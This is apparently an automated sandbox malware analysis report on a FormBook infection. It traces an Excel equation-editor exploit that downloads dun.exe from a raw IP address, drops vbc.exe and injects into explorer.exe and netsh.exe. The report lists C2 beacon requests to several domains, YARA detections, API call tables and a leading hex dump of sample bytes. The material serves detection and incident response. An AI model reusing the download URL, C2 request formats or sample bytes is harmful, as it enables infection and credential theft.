00 00 00 a0 14 00 00 02 00 00 00 64 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 8f 10 00 00 00 00 00 48 00 00 00 02 00 05 00 4c a3 04 00 64 38 04 00 03 00 00 00 4d 08 00 06 b0 db 08 00 c8 b3 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00

Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1Host: www.iotcloud.technologyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1Host: www.micheldrake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 192.0.78.25 192.0.78.25

Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US

Source: global traffic

HTTP traffic detected: GET /www/dun.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.229.216.142Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7AE3BD.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /www/dun.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.229.216.142Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1Host: www.iotcloud.technologyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1Host: www.micheldrake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.cleanxcare.com

Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2171247047.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2166928921.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2178764759.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2167152019.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 7_2_004181B0 NtCreateFile,	7_2_004181B0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418260 NtReadFile,	7_2_00418260
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004182E0 NtClose,	7_2_004182E0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418390 NtAllocateVirtualMemory,	7_2_00418390
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004182AC NtReadFile,	7_2_004182AC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041838B NtAllocateVirtualMemory,	7_2_0041838B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C00C4 NtCreateFile,LdrInitializeThunk,	7_2_008C00C4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk,	7_2_008C0048
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0078 NtResumeThread,LdrInitializeThunk,	7_2_008C0078
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C07AC NtCreateMutant,LdrInitializeThunk,	7_2_008C07AC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF9F0 NtClose,LdrInitializeThunk,	7_2_008BF9F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF900 NtReadFile,LdrInitializeThunk,	7_2_008BF900
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_008BFAD0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_008BFAE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_008BFBB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_008BFB68
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_008BFC90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_008BFC60
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFD8C NtDelayExecution,LdrInitializeThunk,	7_2_008BFD8C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_008BFDC0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk,	7_2_008BFEA0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_008BFED0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFFB4 NtCreateSection,LdrInitializeThunk,	7_2_008BFFB4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C10D0 NtOpenProcessToken,	7_2_008C10D0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0060 NtQuerySection,	7_2_008C0060
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C01D4 NtSetValueKey,	7_2_008C01D4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C010C NtOpenDirectoryObject,	7_2_008C010C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C1148 NtOpenThread,	7_2_008C1148
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF8CC NtWaitForSingleObject,	7_2_008BF8CC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF938 NtWriteFile,	7_2_008BF938
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C1930 NtSetContextThread,	7_2_008C1930
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFAB8 NtQueryValueKey,	7_2_008BFAB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFA20 NtQueryInformationFile,	7_2_008BFA20
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFA50 NtEnumerateValueKey,	7_2_008BFA50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFBE8 NtQueryVirtualMemory,	7_2_008BFBE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFB50 NtCreateKey,	7_2_008BFB50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC30 NtOpenProcess,	7_2_008BFC30
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC48 NtSetInformationFile,	7_2_008BFC48
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0C40 NtGetContextThread,	7_2_008C0C40
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C1D80 NtSuspendThread,	7_2_008C1D80
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFD5C NtEnumerateKey,	7_2_008BFD5C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFE24 NtWriteVirtualMemory,	7_2_008BFE24
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFFFC NtCreateProcessEx,	7_2_008BFFFC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFF34 NtQueueApcThread,	7_2_008BFF34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020400C4 NtCreateFile,LdrInitializeThunk,	9_2_020400C4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020407AC NtCreateMutant,LdrInitializeThunk,	9_2_020407AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FAE8 NtQueryInformationProcess,LdrInitializeThunk,	9_2_0203FAE8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FB50 NtCreateKey,LdrInitializeThunk,	9_2_0203FB50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FB68 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_0203FB68
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FBB8 NtQueryInformationToken,LdrInitializeThunk,	9_2_0203FBB8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F900 NtReadFile,LdrInitializeThunk,	9_2_0203F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F9F0 NtClose,LdrInitializeThunk,	9_2_0203F9F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_0203FED0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FFB4 NtCreateSection,LdrInitializeThunk,	9_2_0203FFB4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC60 NtMapViewOfSection,LdrInitializeThunk,	9_2_0203FC60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FD8C NtDelayExecution,LdrInitializeThunk,	9_2_0203FD8C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FDC0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_0203FDC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040048 NtProtectVirtualMemory,	9_2_02040048
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040060 NtQuerySection,	9_2_02040060
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040078 NtResumeThread,	9_2_02040078
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020410D0 NtOpenProcessToken,	9_2_020410D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204010C NtOpenDirectoryObject,	9_2_0204010C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02041148 NtOpenThread,	9_2_02041148
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020401D4 NtSetValueKey,	9_2_020401D4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FA20 NtQueryInformationFile,	9_2_0203FA20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FA50 NtEnumerateValueKey,	9_2_0203FA50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FAB8 NtQueryValueKey,	9_2_0203FAB8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FAD0 NtAllocateVirtualMemory,	9_2_0203FAD0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FBE8 NtQueryVirtualMemory,	9_2_0203FBE8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F8CC NtWaitForSingleObject,	9_2_0203F8CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02041930 NtSetContextThread,	9_2_02041930
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F938 NtWriteFile,	9_2_0203F938
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FE24 NtWriteVirtualMemory,	9_2_0203FE24
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FEA0 NtReadVirtualMemory,	9_2_0203FEA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FF34 NtQueueApcThread,	9_2_0203FF34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FFFC NtCreateProcessEx,	9_2_0203FFFC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC30 NtOpenProcess,	9_2_0203FC30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040C40 NtGetContextThread,	9_2_02040C40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC48 NtSetInformationFile,	9_2_0203FC48
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC90 NtUnmapViewOfSection,	9_2_0203FC90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FD5C NtEnumerateKey,	9_2_0203FD5C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02041D80 NtSuspendThread,	9_2_02041D80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_002081B0 NtCreateFile,	9_2_002081B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_00208260 NtReadFile,	9_2_00208260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_002082E0 NtClose,	9_2_002082E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_002082AC NtReadFile,	9_2_002082AC

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673	6_2_0137B673
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004082E2	6_2_004082E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405865	6_2_00405865
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403490	6_2_00403490
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004058A8	6_2_004058A8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401151	6_2_00401151
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401502	6_2_00401502
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401508	6_2_00401508
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401990	6_2_00401990
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004019A0	6_2_004019A0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405260	6_2_00405260
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405270	6_2_00405270
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403E20	6_2_00403E20
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004042D7	6_2_004042D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407F00	6_2_00407F00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040170C	6_2_0040170C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401710	6_2_00401710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00400322	6_2_00400322
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00400330	6_2_00400330
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405FFF	6_2_00405FFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401BA8	6_2_00401BA8
